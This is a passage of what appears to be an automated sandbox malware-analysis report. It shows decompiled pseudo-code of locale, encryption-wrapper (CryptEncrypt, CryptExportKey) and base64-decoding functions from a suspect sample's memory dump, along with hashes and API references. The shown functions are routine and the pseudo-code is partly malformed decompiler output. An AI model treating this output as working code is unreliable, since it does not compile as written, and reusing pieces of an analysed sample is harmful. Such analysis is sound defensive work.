				_push(0xffffffff);
				_push(0x1367b2d);
				_push( *[fs:0x0]);
				_t22 =  *0x13a4018; // 0x39cca9f6
				_t23 = _t22 ^ _t48;
				_v20 = _t23;
				_push(_t23);
				 *[fs:0x0] =  &_v16;
				_t46 = _a4;
				_v48 = _t46;
				E012F7D00(__ebx,  &_v44, __edx, 0x104);
				_v8 = 0;
				_t27 =  >=  ? _v44 :  &_v44;
				E013034B0(__ebx,  &_v44, __edi, GetLocaleInfoA(0x400, 0x1001,  >=  ? _v44 :  &_v44, 0x104), 0);
				_t31 = _v28 - 1;
				_v28 = _t31;
				_t38 =  >=  ? _v44 :  &_v44;
				( >=  ? _v44 :  &_v44)[_t31] = 0;
				asm("movups xmm0, [ebp-0x28]");
				 *((intOrPtr*)(_t46 + 0x10)) = 0;
				 *((intOrPtr*)(_t46 + 0x14)) = 0;
				asm("movups [esi], xmm0");
				asm("movq xmm0, [ebp-0x18]");
				asm("movq [esi+0x10], xmm0");
				 *[fs:0x0] = _v16;
				_t47 = 0;
				return E0132EA79(_v20 ^ _t48, _t47);
			}

0x01311f23
0x01311f25
0x01311f30
0x01311f34
0x01311f39
0x01311f3b
0x01311f3f
0x01311f43
0x01311f49
0x01311f56
0x01311f59
0x01311f5e
0x01311f71
0x01311f8c
0x01311f97
0x01311f9c
0x01311f9f
0x01311fa3
0x01311fa9
0x01311fad
0x01311fb4
0x01311fbb
0x01311fbe
0x01311fc3
0x01311fcb
0x01311fd3
0x01311fe1

APIs

GetLocaleInfoA.KERNEL32(00000400,00001001,39CCA9F6,00000104,00000104,00000000,39CCA9F6,00000000,01396CA4,00000002,01396C64), ref: 01311F80

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 671653106b928f4c1d56c605f3aff07a74414f1fb5bac8576518b897d02fb622
Instruction ID: 17b9124181bf23e778e6b81f2bdff9b6cc334be62c3d82ca3994ecef0d0b1cf3
Opcode Fuzzy Hash: 671653106b928f4c1d56c605f3aff07a74414f1fb5bac8576518b897d02fb622
Instruction Fuzzy Hash: 30214A71900649DBDB11DFA8C851BEEFBB4FB18714F10561AE6127B280DBB06684CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0135E60C, Relevance: 1.5, APIs: 1, Instructions: 41
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0135E60C(void* __ecx, void* __edx, void* __eflags, signed char* _a4) {
				void* __ebp;
				intOrPtr _t11;
				signed char* _t15;
				intOrPtr* _t19;
				intOrPtr _t24;
				void* _t25;
				void* _t26;

				_t26 = E013559E0(__ecx, __edx);
				_t24 = 2;
				_t19 =  *((intOrPtr*)(_t26 + 0x50));
				_t25 = _t19 + 2;
				do {
					_t11 =  *_t19;
					_t19 = _t19 + _t24;
				} while (_t11 != 0);
				_t4 = _t19 - _t25 >> 1 == 3;
				 *(_t26 + 0x60) = 0 | _t4;
				if(_t4 != 0) {
					_t24 = E0135E66B( *((intOrPtr*)(_t26 + 0x50)));
				}
				 *((intOrPtr*)(_t26 + 0x5c)) = _t24;
				EnumSystemLocalesW(0x135e8ea, 1);
				_t15 = _a4;
				if(( *_t15 & 0x00000004) == 0) {
					 *_t15 = 0;
					return _t15;
				}
				return _t15;
			}

0x0135e619
0x0135e61f
0x0135e620
0x0135e623
0x0135e626
0x0135e626
0x0135e629
0x0135e62b
0x0135e639
0x0135e63c
0x0135e63f
0x0135e64a
0x0135e64a
0x0135e653
0x0135e656
0x0135e65c
0x0135e662
0x0135e664
0x00000000
0x0135e664
0x0135e66a

APIs

Part of subcall function 013559E0: GetLastError.KERNEL32(?,?,?,01349740,013A18F0,0000000C), ref: 013559E5
Part of subcall function 013559E0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,01349740,013A18F0,0000000C), ref: 01355A83

EnumSystemLocalesW.KERNEL32(0135E8EA,00000001,00000000,?,-00000050,?,0135EC89,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0135E656

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 94ff70e9ac39e091e2ab9961187dab91be4aaf43c096f29d2d7823271d7f7411
Instruction ID: 780a5d196af663bf4bee731f1644a480a0b48f76450cc4263cb1d37e6cdd779a
Opcode Fuzzy Hash: 94ff70e9ac39e091e2ab9961187dab91be4aaf43c096f29d2d7823271d7f7411
Instruction Fuzzy Hash: CAF0C2362003059FDB246F399891E6ABB95FB80FBCF05447CED454B640D675A902D760

Uniqueness

Uniqueness Score: -1.00%

Function 01355CD6, Relevance: 1.5, APIs: 1, Instructions: 33
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E01355CD6(void* __eflags) {
				intOrPtr _t17;
				signed int _t26;
				void* _t28;

				E0132F8E0(0x13a1b10, 0xc);
				 *(_t28 - 0x1c) =  *(_t28 - 0x1c) & 0x00000000;
				E0134BB42( *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)))));
				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
				 *0x13ab4a0 = E01352AA9( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t28 + 0xc)))))));
				_t26 = EnumSystemLocalesW(0x1355cc9, 1);
				_t17 =  *0x13a4018; // 0x39cca9f6
				 *0x13ab4a0 = _t17;
				 *(_t28 - 0x1c) = _t26;
				 *(_t28 - 4) = 0xfffffffe;
				E01355D46();
				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0x10));
				return _t26;
			}

0x01355cdd
0x01355ce2
0x01355ceb
0x01355cf1
0x01355d02
0x01355d14
0x01355d16
0x01355d1b
0x01355d20
0x01355d23
0x01355d2a
0x01355d34
0x01355d40

APIs

Part of subcall function 0134BB42: EnterCriticalSection.KERNEL32(?,?,01357EFA,?,013A1BB8,0000000C), ref: 0134BB51

EnumSystemLocalesW.KERNEL32(01355CC9,00000001,013A1B10,0000000C,01356134,00000000), ref: 01355D0E

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 70f487d37f082400ff66909ba2a20dc073c92670eca74aae9e45327dc7bfd412
Instruction ID: 866ad89df1477def94b5b5a256bb05b39b286bf64115169de708be9f3109cf9d
Opcode Fuzzy Hash: 70f487d37f082400ff66909ba2a20dc073c92670eca74aae9e45327dc7bfd412
Instruction Fuzzy Hash: 2EF04976A40205DFDB20EF9CE441B9DBBF4FB14B29F00412AE8119B394DBB56900DB40

Uniqueness

Uniqueness Score: -1.00%

Function 0135E526, Relevance: 1.5, APIs: 1, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0135E526(void* __ecx, void* __edx, void* __eflags, signed char* _a4) {
				void* __ebp;
				intOrPtr _t9;
				signed char* _t13;
				intOrPtr* _t15;
				void* _t19;
				void* _t21;

				_t19 = E013559E0(__ecx, __edx);
				_t15 =  *((intOrPtr*)(_t19 + 0x54));
				_t21 = _t15 + 2;
				do {
					_t9 =  *_t15;
					_t15 = _t15 + 2;
				} while (_t9 != 0);
				 *(_t19 + 0x64) = 0 | _t15 - _t21 >> 0x00000001 == 0x00000003;
				EnumSystemLocalesW(0x135e47f, 1);
				_t13 = _a4;
				if(( *_t13 & 0x00000004) == 0) {
					 *_t13 = 0;
					return _t13;
				}
				return _t13;
			}

0x0135e532
0x0135e536
0x0135e539
0x0135e53c
0x0135e53c
0x0135e53f
0x0135e542
0x0135e55a
0x0135e55d
0x0135e563
0x0135e569
0x0135e56b
0x00000000
0x0135e56b
0x0135e570

APIs

Part of subcall function 013559E0: GetLastError.KERNEL32(?,?,?,01349740,013A18F0,0000000C), ref: 013559E5
Part of subcall function 013559E0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,01349740,013A18F0,0000000C), ref: 01355A83

EnumSystemLocalesW.KERNEL32(0135E47F,00000001,00000000,?,?,0135ECE7,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 0135E55D

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 73668f4b74b3bcf63762c694e27fc8c93a955058f5b6ff6908b7bcb72b8830b1
Instruction ID: 95a37174e9adb8254037af41c41070f723bf256030bddb3ca78ec32492adb2f0
Opcode Fuzzy Hash: 73668f4b74b3bcf63762c694e27fc8c93a955058f5b6ff6908b7bcb72b8830b1
Instruction Fuzzy Hash: 79F0553630020997CB14AF39E805E6ABF98EFC1B68F060068EE058B241E235E943C790

Uniqueness

Uniqueness Score: -1.00%

Function 01309150, Relevance: 1.5, APIs: 1, Instructions: 27
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E01309150(intOrPtr _a4, signed char _a8, char _a12) {
				signed int _v8;
				char _v12;
				signed int _t9;
				void* _t19;
				signed int _t20;

				_t9 =  *0x13a4018; // 0x39cca9f6
				_v8 = _t9 ^ _t20;
				_v12 = _a12;
				__imp__CryptEncrypt(0, _a8 & 0x000000ff, 0, 0,  &_v12, 0);
				asm("sbb eax, eax");
				return E0132EA79(_v8 ^ _t20, _t19, _a4);
			}

0x01309156
0x0130915d
0x01309165
0x0130917a
0x01309185
0x01309194

APIs

CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0130917A

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: CryptEncrypt
String ID:
API String ID: 1352496322-0
Opcode ID: f62a711588614bcce16b5cc873bd396835356ed2ca0fe334648acebfd9b68081
Instruction ID: 69b5ad3b38486017f25cef296ff3e264a6119916934322a5752515daf81269b4
Opcode Fuzzy Hash: f62a711588614bcce16b5cc873bd396835356ed2ca0fe334648acebfd9b68081
Instruction Fuzzy Hash: 8DF0E57265420CFBDB20DFA8DC42FAEBBB8AB04701F504166F905DB1C0D670AB54AB54

Uniqueness

Uniqueness Score: -1.00%

Function 0130A050, Relevance: 1.5, APIs: 1, Instructions: 24
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E0130A050(intOrPtr _a4) {
				signed int _v8;
				char _v12;
				signed int _t7;
				void* _t15;
				signed int _t16;

				_t7 =  *0x13a4018; // 0x39cca9f6
				_v8 = _t7 ^ _t16;
				_v12 = 0;
				__imp__CryptExportKey(0, 8, 0, 0,  &_v12);
				asm("sbb eax, eax");
				return E0132EA79(_v8 ^ _t16, _t15, _a4);
			}

0x0130a056
0x0130a05d
0x0130a063
0x0130a076
0x0130a081
0x0130a090

APIs

CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 0130A076

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: CryptExport
String ID:
API String ID: 3389274496-0
Opcode ID: 7fc380813273ba135e77201ba59d2f1391438be55074a958f43f7f23b39e0522
Instruction ID: 1f83855b237de7c0c1de81ae1c2927b3013d8630c6c103c244fb7e6da3358d89
Opcode Fuzzy Hash: 7fc380813273ba135e77201ba59d2f1391438be55074a958f43f7f23b39e0522
Instruction Fuzzy Hash: DDE01271A9020CBBDB20DFA4DC46F9DBBB8BB14701F504165E901A71C0DA707A589B44

Uniqueness

Uniqueness Score: -1.00%

Function 0135628F, Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,01354C44,?,20001004,00000000,00000002,?,?,01354251), ref: 013562C3

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: de11e0cd52ab4ceca7692e38d1943fc99ae30eba8a1bd5c9a052575555b98354
Instruction ID: ddf0465f597fe790a17a15b9d57c158cdb9ee2189358acdeedddd16ef06d645b
Opcode Fuzzy Hash: de11e0cd52ab4ceca7692e38d1943fc99ae30eba8a1bd5c9a052575555b98354
Instruction Fuzzy Hash: ECE0867654121DBBDF622F64DC05EAE7F6AEF44F60F044014FD0565120CB3299319BD0

Uniqueness

Uniqueness Score: -1.00%

Function 0130A0A0, Relevance: 1.5, APIs: 1, Instructions: 20encryptionCOMMON

Download Yara Rule

APIs

CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000001,?,00000000,?,01309CBE,?,00000001,?,00000000,?,00000000,?), ref: 0130A0C2

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: CryptEncrypt
String ID:
API String ID: 1352496322-0
Opcode ID: 8f878edbe1e821ab5670b989743aa757361a32d0e35e0079f1474617f5a2f7fe
Instruction ID: 461fd789b9bb9580151cb8fc61de434f7711ba1f892b2459be40a6fd84c37330
Opcode Fuzzy Hash: 8f878edbe1e821ab5670b989743aa757361a32d0e35e0079f1474617f5a2f7fe
Instruction Fuzzy Hash: 45E0EC3115020DAFEB25CF95DC06FAA3BADAB15710F008014FA118A1E1D771E960EB64

Uniqueness

Uniqueness Score: -1.00%

Function 0130A0E0, Relevance: 1.5, APIs: 1, Instructions: 18encryptionCOMMON

Download Yara Rule

APIs

CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000001,?,01309CA4,00000000,?,00000000,00000000,00000000,?,00000001,00000000), ref: 0130A0FC

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: CryptExport
String ID:
API String ID: 3389274496-0
Opcode ID: 936ac93209a31c8e5946286b51eaf988262dadbb049f3000dda1025c0613fa72
Instruction ID: 7052359b4cd599c4c9397045de480d6a1f1d8ed42ab90101a032128365babd44
Opcode Fuzzy Hash: 936ac93209a31c8e5946286b51eaf988262dadbb049f3000dda1025c0613fa72
Instruction Fuzzy Hash: 0DD01730290309EFE724CE44EC0AF6A37ADBB10B11F048018BA008B1E0D7B1F950DB54

Uniqueness

Uniqueness Score: -1.00%

Function 012F9180, Relevance: .2, Instructions: 215
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E012F9180(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v17;
				unsigned char _v18;
				signed char _v20;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t59;
				intOrPtr _t62;
				intOrPtr* _t63;
				intOrPtr _t64;
				signed int _t65;
				signed int _t66;
				signed char _t67;
				intOrPtr* _t73;
				void* _t76;
				intOrPtr* _t77;
				char _t78;
				signed int _t79;
				signed int _t80;
				signed char _t81;
				intOrPtr _t87;
				intOrPtr* _t89;
				void* _t92;
				intOrPtr _t93;
				intOrPtr _t95;
				intOrPtr _t97;
				intOrPtr _t101;
				intOrPtr _t102;
				intOrPtr _t113;
				unsigned char _t126;
				unsigned char _t133;
				intOrPtr _t136;
				void* _t138;
				void* _t139;
				void* _t142;
				intOrPtr _t144;
				void* _t146;
				void* _t148;
				void* _t149;
				signed int _t150;
				void* _t151;
				void* _t152;

				_t121 = __edx;
				_push(0xffffffff);
				_push(0x136586e);
				_push( *[fs:0x0]);
				_t152 = _t151 - 0x24;
				_t59 =  *0x13a4018; // 0x39cca9f6
				_push(_t59 ^ _t150);
				 *[fs:0x0] =  &_v16;
				_t89 = __edx;
				_v44 = __edx;
				_t62 = __ecx;
				_v32 = __ecx;
				_v36 = __ecx;
				_v52 = __ecx;
				_t144 = 0;
				_v40 = 0;
				_t136 = 0;
				_t97 =  *((intOrPtr*)(__edx + 0x10));
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0xf;
				 *((char*)(__ecx)) = 0;
				_v8 = 0;
				_v40 = 1;
				if(_t97 == 0) {
					L36:
					 *[fs:0x0] = _v16;
					return _t62;
				} else {
					while(1) {
						_t63 = _t89;
						_v36 = _t97 - 1;
						_t101 =  *((intOrPtr*)(_t89 + 0x14));
						if(_t101 >= 0x10) {
							_t63 =  *_t89;
						}
						if( *((char*)(_t63 + _t136)) == 0x3d) {
							break;
						}
						_t73 = _t89;
						if(_t101 >= 0x10) {
							_t73 =  *_t89;
						}
						_t74 =  *((intOrPtr*)(_t73 + _t136));
						_v25 =  *((intOrPtr*)(_t73 + _t136));
						_t76 = E01349C70(_t89, _t101, _t121, _t74 & 0x000000ff);
						_t152 = _t152 + 4;
						if(_t76 != 0) {
							L9:
							_t77 = _t89;
							if( *((intOrPtr*)(_t89 + 0x14)) >= 0x10) {
								_t77 =  *_t89;
							}
							_t78 =  *((intOrPtr*)(_t77 + _t136));
							_t136 = _t136 + 1;
							 *((char*)(_t150 + _t144 - 0x10)) = _t78;
							_t144 = _t144 + 1;
							_v48 = _t136;
							if(_t144 == 4) {
								_t113 =  *0x13a4b94; // 0x0
								_t148 = 0;
								do {
									_t79 =  *(_t150 + _t148 - 0x10);
									_t142 =  >=  ?  *0x13a4b84 : 0x13a4b84;
									if(_t113 == 0) {
										L16:
										_t80 = _t79 | 0xffffffff;
									} else {
										_t79 = E01347A30(0x13a4b84, _t79, _t113);
										_t152 = _t152 + 0xc;
										if(_t79 == 0) {
											goto L16;
										} else {
											_t80 = _t79 - 0x13a4b84;
										}
									}
									_t113 =  *0x13a4b94; // 0x0
									 *(_t150 + _t148 - 0x10) = _t80;
									_t148 = _t148 + 1;
								} while (_t148 < 4);
								_t81 = _v20;
								_t95 = _v32;
								_v24 = (_t81 >> 0x00000004 & 0x00000003) + (_t81 << 2);
								_t133 = _v18;
								_t121 = (_t133 << 6) + _v17;
								_v22 = (_t133 << 6) + _v17;
								_t149 = 0;
								_v23 = (_t133 >> 0x00000002 & 0x0000000f) + (_t81 << 4);
								do {
									E012FC280(_t95, _t95, _t142, _t149,  *(_t150 + _t149 - 0x14) & 0x000000ff);
									_t149 = _t149 + 1;
								} while (_t149 < 3);
								_t89 = _v44;
								_t144 = 0;
								_t136 = _v48;
							}
							_t97 = _v36;
							if(_t97 != 0) {
								continue;
							}
						} else {
							_t87 = _v25;
							if(_t87 == 0x2b || _t87 == 0x2f) {
								goto L9;
							}
						}
						break;
					}
					if(_t144 == 0) {
						L35:
						_t62 = _v32;
						goto L36;
					} else {
						_t64 = _t144;
						if(_t144 < 4) {
							do {
								 *((char*)(_t150 + _t64 - 0x10)) = 0;
								_t64 = _t64 + 1;
							} while (_t64 < 4);
						}
						_t102 =  *0x13a4b94; // 0x0
						_t138 = 0;
						do {
							_t65 =  *(_t150 + _t138 - 0x10);
							_t92 =  >=  ?  *0x13a4b84 : 0x13a4b84;
							if(_t102 == 0) {
								L29:
								_t66 = _t65 | 0xffffffff;
							} else {
								_t65 = E01347A30(0x13a4b84, _t65, _t102);
								_t152 = _t152 + 0xc;
								if(_t65 == 0) {
									goto L29;
								} else {
									_t66 = _t65 - _t92;
								}
							}
							_t102 =  *0x13a4b94; // 0x0
							 *(_t150 + _t138 - 0x10) = _t66;
							_t138 = _t138 + 1;
						} while (_t138 < 4);
						_t67 = _v20;
						_t46 = _t144 - 1; // -1
						_t139 = _t46;
						_v24 = (_t67 >> 0x00000004 & 0x00000003) + (_t67 << 2);
						_t146 = 0;
						_t126 = _v18;
						_v22 = (_t126 << 6) + _v17;
						_v23 = (_t126 >> 0x00000002 & 0x0000000f) + (_t67 << 4);
						if(_t139 == 0) {
							goto L35;
						} else {
							_t93 = _v32;
							do {
								E012FC280(_t93, _t93, _t139, _t146,  *(_t150 + _t146 - 0x14) & 0x000000ff);
								_t146 = _t146 + 1;
							} while (_t146 < _t139);
							 *[fs:0x0] = _v16;
							return _t93;
						}
					}
				}
			}

0x012f9180
0x012f9183
0x012f9185
0x012f9190
0x012f9191
0x012f9197
0x012f919e
0x012f91a2
0x012f91a8
0x012f91aa
0x012f91ad
0x012f91af
0x012f91b2
0x012f91b5
0x012f91b8
0x012f91ba
0x012f91c1
0x012f91c3
0x012f91c6
0x012f91c9
0x012f91d0
0x012f91d3
0x012f91d6
0x012f91df
0x012f93dc
0x012f93df
0x012f93ed
0x012f91e5
0x012f91e5
0x012f91e6
0x012f91e8
0x012f91eb
0x012f91f1
0x012f91f3
0x012f91f3
0x012f91f9
0x00000000
0x00000000
0x012f91ff
0x012f9204
0x012f9206
0x012f9206
0x012f9208
0x012f920b
0x012f9212
0x012f9217
0x012f921c
0x012f922d
0x012f9231
0x012f9233
0x012f9235
0x012f9235
0x012f9237
0x012f923a
0x012f923b
0x012f923f
0x012f9240
0x012f9246
0x012f924c
0x012f9252
0x012f9260
0x012f926c
0x012f9270
0x012f9279
0x012f9291
0x012f9291
0x012f927b
0x012f9281
0x012f9286
0x012f928b
0x00000000
0x012f928d
0x012f928d
0x012f928d
0x012f928b
0x012f9294
0x012f929a
0x012f929e
0x012f929f
0x012f92a4
0x012f92a9
0x012f92be
0x012f92c1
0x012f92c9
0x012f92d2
0x012f92d7
0x012f92d9
0x012f92e0
0x012f92e8
0x012f92ed
0x012f92ee
0x012f92f3
0x012f92f6
0x012f92f8
0x012f92f8
0x012f92fb
0x012f9300
0x00000000
0x00000000
0x012f921e
0x012f921e
0x012f9223
0x00000000
0x00000000
0x012f9223
0x00000000
0x012f921c
0x012f9308
0x012f93d9
0x012f93d9
0x00000000
0x012f930e
0x012f930e
0x012f9313
0x012f9315
0x012f9315
0x012f931a
0x012f931b
0x012f9315
0x012f9320
0x012f9326
0x012f9330
0x012f933c
0x012f9340
0x012f9349
0x012f9361
0x012f9361
0x012f934b
0x012f9351
0x012f9356
0x012f935b
0x00000000
0x012f935d
0x012f935d
0x012f935d
0x012f935b
0x012f9364
0x012f936a
0x012f936e
0x012f936f
0x012f9374
0x012f9377
0x012f9377
0x012f938e
0x012f9391
0x012f9393
0x012f93a4
0x012f93a9
0x012f93ae
0x00000000
0x012f93b0
0x012f93b0
0x012f93b3
0x012f93bb
0x012f93c0
0x012f93c1
0x012f93ca
0x012f93d8
0x012f93d8
0x012f93ae
0x012f9308

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbcc6e2a6f2c4259a50ccd72fc90bada03a2d2b91490835a7e3c066ac25c692b
